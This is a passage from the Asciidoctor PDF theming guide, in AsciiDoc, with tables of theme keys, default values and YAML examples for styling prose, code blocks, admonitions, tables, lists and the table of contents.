Page background images are automatically scaled to fit within the bounds of the page.\n+\nNOTE: Page backgrounds do not currently work when using AsciidoctorJ PDF.\nThis limitation is due to a bug in Prawn 1.3.1.\nThe limitation will remain until AsciidoctorJ PDF upgrades to Prawn 2.x (an upgrade that is waiting on AsciidoctorJ to migrate to JRuby 9000).\nFor more details, see http:\/\/discuss.asciidoctor.org\/Asciidoctor-YAML-style-file-for-PDF-and-maven-td3849.html[this thread].\n. Target may be an absolute path or a path relative to the value of the `pdf-stylesdir` attribute.\n. Percentage unit can be % (relative to content height) or vh (relative to page height).\n\n[#keys-prose]\n=== Prose\n\nThe keys in this category control the spacing around paragraphs (paragraph blocks, paragraph content of a block, and other prose content).\nTypically, all the margin is placed on the bottom.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-prose]*Key Prefix:* <<key-prefix-prose,prose>>\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|prose:\n margin_top: 0\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|prose:\n margin_bottom: $vertical_spacing\n|===\n\n[#keys-block]\n=== Block\n\nThe keys in this category control the spacing around block elements when a more specific setting is not designated.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-block]*Key Prefix:* <<key-prefix-block,block>>\n\n\/\/|padding\n\/\/|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>>\n\/\/|block:\n\/\/ padding: [12, 15, 12, 15]\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|block:\n margin_top: 6\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|block:\n margin_bottom: 6\n|===\n\nBlock styles are applied to the following block types:\n\n[cols=\"3*a\",grid=none,frame=none]\n|===\n|\n* admonition\n* example\n* quote\n|\n* verse\n* sidebar\n* image\n|\n* listing\n* literal\n* table\n|===\n\n[#keys-caption]\n=== Caption\n\nThe keys in this category control the arrangement and style of block captions.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-caption]*Key Prefix:* <<key-prefix-caption,caption>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: left)\n|caption:\n align: left\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|caption:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|caption:\n font_family: M+ 1mn\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|caption:\n font_size: 11\n\n|font_style\n|<<font-styles,Font style>> +\n(default: italic)\n|caption:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|caption:\n text_transform: uppercase\n\n|margin_inside\n|<<measurement-units,Measurement>> +\n(default: 4)\n|caption:\n margin_inside: 3\n\n|margin_outside\n|<<measurement-units,Measurement>> +\n(default: 0)\n|caption:\n margin_outside: 0\n|===\n\n[#keys-code]\n=== Code\n\nThe keys in this category are used to control the style of literal, listing and source blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-code]*Key Prefix:* <<key-prefix-code,code>>\n\n|background_color\n|<<colors,Color>> +\n(default: _not set_)\n|code:\n background_color: #f5f5f5\n\n|border_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|code:\n border_color: 
#cccccc\n\n|border_radius\n|<<values,Number>> +\n(default: _not set_)\n|code:\n border_radius: 4\n\n|border_width\n|<<values,Number>> +\n(default: 0.5)\n|code:\n border_width: 0.75\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|code:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: Courier)\n|code:\n font_family: M+ 1mn\n\n|font_size\n|<<values,Number>> +\n(default: 10.5)\n|code:\n font_size: 11\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|code:\n font_style: italic\n\n|line_height\n|<<values,Number>> +\n(default: 1.2)\n|code:\n line_height: 1.25\n\n|line_gap^[1]^\n|<<values,Number>> +\n(default: 0)\n|code:\n line_gap: 3.8\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 9)\n|code:\n padding: 11\n\n3+|[#key-prefix-code-linenum]*Key Prefix:* <<key-prefix-code-linenum,code_linenum>>^[2]^\n\n|font_color\n|<<colors,Color>> +\n(default: #999999)\n|code:\n linenum_font_color: #ccc\n|===\n\n. The line_gap is used to tune the height of the background color applied to a span of block text highlighted using Rouge.\n. The code_linenum category only applies when using Pygments as the source highlighter.\nOtherwise, the style is controlled by the source highlighter theme.\n\n[#keys-callout-numbers]\n=== Callout Numbers\n\nThe keys in this category are used to control the style of callout numbers (conums) inside verbatim blocks and in callout lists (colists).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-conum]*Key Prefix:* <<key-prefix-conum,conum>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|conum:\n font_color: #b12146\n\n|font_family^[1,2]^\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|conum:\n font_family: M+ 1mn\n\n|font_size^[2]^\n|<<values,Number>> +\n(default: _inherit_)\n|conum:\n font_size: $base_font_size\n\n|font_style^[2]^\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|conum:\n font_style: normal\n\n|line_height^[2]^\n|<<values,Number>> +\n(default: 1.15)\n|conum:\n line_height: 4 \/ 3\n|===\n\n. Currently, the font must contain the circled numbers starting at glyph U+2460.\n. 
font_family, font_size, font_style, and line_height are only used for markers in a colist.\nThese properties are inherited for conums inside a verbatim block.\n\n[#keys-menu]\n=== Menu\n\nThe keys in this category apply to the menu label (generated from the inline menu macro).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-menu]*Key Prefix:* <<key-prefix-menu,menu>>\n\n|caret_content\n|<<quoted-string,Quoted string>> +\n(default: \" \\u203a \")\n|menu:\n caret_content: ' > '\n|===\n\n[#keys-blockquote]\n=== Blockquote\n\nThe keys in this category control the arrangement and style of quote blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-blockquote]*Key Prefix:* <<key-prefix-blockquote,blockquote>>\n\n|border_width^[1]^\n|<<values,Number>> +\n(default: 4)\n|blockquote:\n border_width: 5\n\n|border_color^[1]^\n|<<colors,Color>> +\n(default: #eeeeee)\n|blockquote:\n border_color: #eeeeee\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|blockquote:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|blockquote:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|blockquote:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|blockquote:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|blockquote:\n text_transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [6, 12, -6, 14])\n|blockquote:\n padding: [5, 10, -5, 12]\n\n3+|[#key-prefix-blockquote-cite]*Key Prefix:* <<key-prefix-blockquote-cite,blockquote_cite>>\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font_size: 9\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font_color: #999999\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font_family: Noto Serif\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|blockquote:\n cite:\n text_transform: uppercase\n|===\n\n. 
Only applies to the left side.\n\n[#keys-sidebar]\n=== Sidebar\n\nThe keys in this category control the arrangement and style of sidebar blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-sidebar]*Key Prefix:* <<key-prefix-sidebar,sidebar>>\n\n|background_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|sidebar:\n background_color: #eeeeee\n\n|border_color\n|<<colors,Color>> +\n(default: _not set_)\n|sidebar:\n border_color: #ffffff\n\n|border_radius\n|<<values,Number>> +\n(default: _not set_)\n|sidebar:\n border_radius: 4\n\n|border_width\n|<<values,Number>> +\n(default: _not set_)\n|sidebar:\n border_width: 0.5\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|sidebar:\n font_color: #262626\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|sidebar:\n font_family: M+ 1p\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|sidebar:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|sidebar:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|sidebar:\n text_transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [12, 12, 0, 12])\n|sidebar:\n padding: [12, 15, 0, 15]\n\n3+|[#key-prefix-sidebar-title]*Key Prefix:* <<key-prefix-sidebar-title,sidebar_title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|sidebar:\n title:\n align: center\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|sidebar:\n title:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|sidebar:\n title:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|sidebar:\n title:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|sidebar:\n title:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|sidebar:\n title:\n text_transform: uppercase\n|===\n\n[#keys-example]\n=== Example\n\nThe keys in this category control the arrangement and style of example blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-example]*Key Prefix:* <<key-prefix-example,example>>\n\n|background_color\n|<<colors,Color>> +\n(default: #ffffff)\n|example:\n background_color: #fffef7\n\n|border_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|example:\n border_color: #eeeeee\n\n|border_radius\n|<<values,Number>> +\n(default: _not set_)\n|example:\n border_radius: 4\n\n|border_width\n|<<values,Number>> +\n(default: 0.5)\n|example:\n border_width: 0.75\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|example:\n font_color: #262626\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|example:\n font_family: M+ 1p\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|example:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|example:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|example:\n text_transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [12, 12, 0, 12])\n|example:\n padding: [15, 15, 0, 15]\n|===\n\n[#keys-admonition]\n=== Admonition\n\nThe keys in this category control the arrangement and style of admonition blocks and the icon used for each admonition 
type.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-admonition]*Key Prefix:* <<key-prefix-admonition,admonition>>\n\n|column_rule_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|admonition:\n column_rule_color: #aa0000\n\n|column_rule_style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|admonition:\n column_rule_style: double\n\n|column_rule_width\n|<<values,Number>> +\n(default: 0.5)\n|admonition:\n column_rule_width: 0.5\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|admonition:\n font_color: #999999\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|admonition:\n font_family: Noto Sans\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|admonition:\n font_size: $base_font_size_large\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|admonition:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|admonition:\n text_transform: none\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [0, 12, 0, 12])\n|admonition:\n padding: [0, 12, 0, 12]\n\n3+|[#key-prefix-admonition-label]*Key Prefix:* <<key-prefix-admonition-label,admonition_label>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|admonition:\n label:\n align: center\n\n|min_width\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|admonition:\n label:\n min_width: 48\n\n|padding^[1]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: $admonition_padding)\n|admonition:\n label:\n padding: [0, 12, 0, 12]\n\n|vertical_align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|admonition:\n label:\n vertical_align: top\n\n3+|*Key Prefix:* admonition_label, admonition_label_<name>^[2]^\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|admonition:\n label:\n font_color: #262626\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|admonition:\n label:\n font_family: M+ 1p\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|admonition:\n label:\n font_size: 12\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|admonition:\n label:\n font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: uppercase)\n|admonition:\n label:\n text_transform: lowercase\n\n3+|[#key-prefix-admonition-icon]*Key Prefix:* <<key-prefix-admonition-icon,admonition_icon_<name> >>^[2]^\n\n|name\n|<icon set>-<icon name>^[3]^ +\n(default: _not set_)\n|admonition:\n icon:\n tip:\n name: fa-fire\n\n|stroke_color\n|<<colors,Color>> +\n(default: caution=#bf3400; important=#bf0000; note=#19407c; tip=#111111; warning=#bf6900)\n|admonition:\n icon:\n important:\n stroke_color: ff0000\n\n|size\n|<<values,Number>> +\n(default: 24)\n|admonition:\n icon:\n note:\n size: 24\n|===\n\n. The top and bottom padding values are ignored on admonition_label_padding.\n. `<name>` can be `note`, `tip`, `warning`, `important`, or `caution`.\nThe subkeys in the icon category cannot be flattened (e.g., `tip_name: fa-lightbulb-o` is not valid syntax).\n. 
\n\n[#keys-image]\n=== Image\n\nThe keys in this category control the arrangement of block images.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-image]*Key Prefix:* <<key-prefix-image,image>>\n\n|align\n|<<image-alignments,Image alignment>> +\n(default: left)\n|image:\n align: left\n\n|width^[1]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|image:\n width: 100%\n|===\n\n. Only applies to block images.\nIf specified, this value takes precedence over the value of the `width` attribute on the image macro, but not over the value of the `pdfwidth` attribute.\n\n[#keys-lead]\n=== Lead\n\nThe keys in this category control the styling of lead paragraphs.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-lead]*Key Prefix:* <<key-prefix-lead,lead>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|lead:\n font_color: #262626\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|lead:\n font_family: M+ 1p\n\n|font_size\n|<<values,Number>> +\n(default: 13.5)\n|lead:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|lead:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|lead:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.4)\n|lead:\n line_height: 1.4\n|===\n\n[#keys-abstract]\n=== Abstract\n\nThe keys in this category control the arrangement and style of the abstract.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-abstract]*Key Prefix:* <<key-prefix-abstract,abstract>>\n\n|font_color\n|<<colors,Color>> +\n(default: $base_font_color)\n|abstract:\n font_color: #5c6266\n\n|font_size\n|<<values,Number>> +\n(default: 13.5)\n|abstract:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: $base_font_style)\n|abstract:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $base_text_transform)\n|abstract:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.4)\n|abstract:\n line_height: 1.4\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|abstract:\n padding: [0, 12, 0, 12]\n\n3+|[#key-prefix-abstract-title]*Key Prefix:* <<key-prefix-abstract-title,abstract_title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|abstract:\n title:\n align: center\n\n|font_color\n|<<colors,Color>> +\n(default: $base_font_color)\n|abstract:\n title:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $base_font_family)\n|abstract:\n title:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: $base_font_size)\n|abstract:\n title:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|abstract:\n title:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $base_text_transform)\n|abstract:\n title:\n text_transform: uppercase\n|===\n\n[#keys-thematic-break]\n=== Thematic Break\n\nThe keys in this category control the style of thematic breaks (aka horizontal rules).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-thematic-break]*Key Prefix:* 
<<key-prefix-thematic-break,thematic_break>>\n\n|border_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|thematic_break:\n border_color: #eeeeee\n\n|border_style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|thematic_break:\n border_style: dashed\n\n|border_width\n|<<measurement-units,Measurement>> +\n(default: 0.5)\n|thematic_break:\n border_width: 0.5\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|thematic_break:\n margin_top: 6\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: $vertical_spacing)\n|thematic_break:\n margin_bottom: 18\n|===\n\n[#keys-description-list]\n=== Description List\n\nThe keys in this category control the arrangement and style of definition list items (terms and descriptions).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-description-list]*Key Prefix:* <<key-prefix-description-list,description_list>>\n\n|term_font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|description_list:\n term_font_style: italic\n\n|term_spacing\n|<<measurement-units,Measurement>> +\n(default: 4)\n|description_list:\n term_spacing: 5\n\n|description_indent\n|<<values,Number>> +\n(default: 30)\n|description_list:\n description_indent: 15\n|===\n\n[#keys-outline-list]\n=== Outline List\n\nThe keys in this category control the arrangement and style of outline list items.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-outline-list]*Key Prefix:* <<key-prefix-outline-list,outline_list>>\n\n|indent\n|<<measurement-units,Measurement>> +\n(default: 30)\n|outline_list:\n indent: 40\n\n|item_spacing\n|<<measurement-units,Measurement>> +\n(default: 6)\n|outline_list:\n item_spacing: 4\n\n|marker_font_color^[1]^\n|<<colors,Color>> +\n(default: _inherit_)\n|outline_list:\n marker_font_color: #3c763d\n\n|text_align^[2]^\n|<<text-alignments,Text alignment>> +\n(default: $base_align)\n|outline_list:\n text_align: left\n|===\n\n. Controls the color of the bullet glyph that marks items in unordered lists and the number for items in ordered lists.\n. Controls the alignment of the list text only, not nested content (blocks or lists).\n\n[#keys-ulist]\n=== Unordered List\n\nThe keys in this category control the arrangement and style of unordered list items.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-ulist-marker]*Key Prefix:* <<key-prefix-ulist-marker,ulist_marker>>\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|ulist:\n marker:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n font_size: 9\n\n|font_color\n|<<colors,Color>> +\n(default: $outline_list_marker_font_color)\n|ulist:\n marker:\n font_color: #cccccc\n\n|line_height\n|<<values,Number>> +\n(default: $base_line_height)\n|ulist:\n marker:\n line_height: 1.5\n|===\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|*Key Prefix:* ulist_marker_<type>^[1]^\n\n|content\n|<<quoted-string,Quoted string>>\n|ulist:\n marker:\n disc:\n content: \"\\uf140\"\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font_family: fa\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font_size: 9\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font_color: #ff0000\n\n|line_height\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n line_height: 2\n|===\n\n. `<type>` is one of `disc`, `square`, `circle`, `checked`, or `unchecked`.
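\n\nTo see how these keys fit together, here's a minimal sketch that dims the marker color for all unordered lists and swaps in a Font Awesome glyph for the top-level disc marker (the `fa` font family and the `\\uf140` glyph are taken from the examples above; the colors are arbitrary choices):\n\n[source,yaml]\n----\nulist:\n  marker:\n    font_color: #999999\n    disc:\n      font_family: fa\n      content: \"\\uf140\"\n      font_size: 9\n----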
\n\n[#keys-table]\n=== Table\n\nThe keys in this category control the arrangement and style of tables and table cells.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-table]*Key Prefix:* <<key-prefix-table,table>>\n\n|background_color\n|<<colors,Color>> +\n(default: transparent)\n|table:\n background_color: #ffffff\n\n|border_color\n|<<colors,Color>> +\n(default: #000000)\n|table:\n border_color: #dddddd\n\n|border_style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n border_style: solid\n\n|border_width\n|<<values,Number>> +\n(default: 0.5)\n|table:\n border_width: 0.5\n\n|caption_side\n|top {vbar} bottom +\n(default: top)\n|table:\n caption_side: bottom\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|table:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|table:\n font_family: Helvetica\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|table:\n font_size: 9.5\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|table:\n font_style: italic\n\n|grid_color\n|<<colors,Color>> +\n(default: $table_border_color)\n|table:\n grid_color: #eeeeee\n\n|grid_style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n grid_style: dashed\n\n|grid_width\n|<<values,Number>> +\n(default: $table_border_width)\n|table:\n grid_width: 0.5\n\n3+|[#key-prefix-table-head]*Key Prefix:* <<key-prefix-table-head,table_head>>\n\n\/\/|align\n\/\/|<<text-alignments,Text alignment>> +\n\/\/(default: _inherit_)\n\/\/|table:\n\/\/ head:\n\/\/ align: center\n\n|background_color\n|<<colors,Color>> +\n(default: $table_background_color)\n|table:\n head:\n background_color: #f0f0f0\n\n|font_color\n|<<colors,Color>> +\n(default: $table_font_color)\n|table:\n head:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $table_font_family)\n|table:\n head:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: $table_font_size)\n|table:\n head:\n font_size: 10\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|table:\n head:\n font_style: normal\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|table:\n head:\n text_transform: uppercase\n\n3+|[#key-prefix-table-body]*Key Prefix:* <<key-prefix-table-body,table_body>>\n\n|background_color\n|<<colors,Color>> +\n(default: $table_background_color)\n|table:\n body:\n background_color: #fdfdfd\n\n|stripe_background_color^[1]^\n|<<colors,Color>> +\n(default: #eeeeee)\n|table:\n body:\n stripe_background_color: #efefef\n\n3+|[#key-prefix-table-foot]*Key Prefix:* <<key-prefix-table-foot,table_foot>>\n\n|background_color\n|<<colors,Color>> +\n(default: $table_background_color)\n|table:\n foot:\n background_color: #f0f0f0\n\n|font_color\n|<<colors,Color>> +\n(default: $table_font_color)\n|table:\n foot:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $table_font_family)\n|table:\n foot:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: $table_font_size)\n|table:\n foot:\n font_size: 10\n\n|font_style\n|<<font-styles,Font style>> +\n(default: normal)\n|table:\n foot:\n font_style: italic\n\n\/\/deprecated\n\/\/3+|[#key-prefix-table-row]*Key Prefix:* <<key-prefix-table-row,table_<parity>_row>>^[1]^\n\/\/\n\/\/|background_color\n\/\/|<<colors,Color>> +\n\/\/(default: $table_background_color)\n\/\/|table:\n\/\/ even_row:\n\/\/ background_color: 
#f9f9f9\n\n3+|[#key-prefix-table-cell]*Key Prefix:* <<key-prefix-table-cell,table_cell>>\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 2)\n|table:\n cell:\n padding: 3\n\n3+|[#key-prefix-table-header-cell]*Key Prefix:* <<key-prefix-table-header-cell,table_header_cell>>\n\n\/\/|align\n\/\/|<<text-alignments,Text alignment>> +\n\/\/(default: $table_head_align)\n\/\/|table:\n\/\/ header_cell:\n\/\/ align: center\n\n|background_color\n|<<colors,Color>> +\n(default: $table_head_background_color)\n|table:\n header_cell:\n background_color: #f0f0f0\n\n|font_color\n|<<colors,Color>> +\n(default: $table_head_font_color)\n|table:\n header_cell:\n font_color: #1a1a1a\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $table_head_font_family)\n|table:\n header_cell: \n font_family: Noto Sans\n\n|font_size\n|<<values,Number>> +\n(default: $table_head_font_size)\n|table:\n header_cell:\n font_size: 12\n\n|font_style\n|<<font-styles,Font style>> +\n(default: $table_head_font_style)\n|table:\n header_cell:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $table_head_text_transform)\n|table:\n header_cell:\n text_transform: uppercase\n|===\n. Applied to even rows by default; controlled using `stripes` attribute (even, odd, all, none) on table.\n\/\/. `<parity>` can be `odd` (odd rows) or `even` (even rows).\n\n[#keys-table-of-contents]\n=== Table of Contents (TOC)\n\nThe keys in this category control the arrangement and style of the table of contents.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-toc]*Key Prefix:* <<key-prefix-toc,toc>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|toc:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|toc:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n\/\/ QUESTION why is the default not inherited?\n(default: normal)\n|toc:\n font_style: bold\n\n|text_decoration\n|none {vbar} underline +\n(default: none)\n|toc:\n text_decoration: underline\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|toc:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.4)\n|toc:\n line_height: 1.5\n\n|indent\n|<<measurement-units,Measurement>> +\n(default: 15)\n|toc:\n indent: 20\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|toc:\n margin_top: 0\n\n3+|[#key-prefix-toc-level]*Key Prefix:* <<key-prefix-toc-level,toc_h<n> >>^[1]^\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n h3_font_color: #999999\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|toc:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|toc:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|toc:\n font_style: italic\n\n|text_decoration\n|none {vbar} underline +\n(default: _inherit_)\n|toc:\n text_decoration: none\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|toc:\n text_transform: uppercase\n\n3+|[#key-prefix-toc-title]*Key Prefix:* <<key-prefix-toc-title,toc_title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $heading_h2_align)\n|toc:\n title:\n align: right\n\n|font_color\n|<<colors,Color>> +\n(default: $heading_h2_font_color)\n|toc:\n title:\n font_color: 
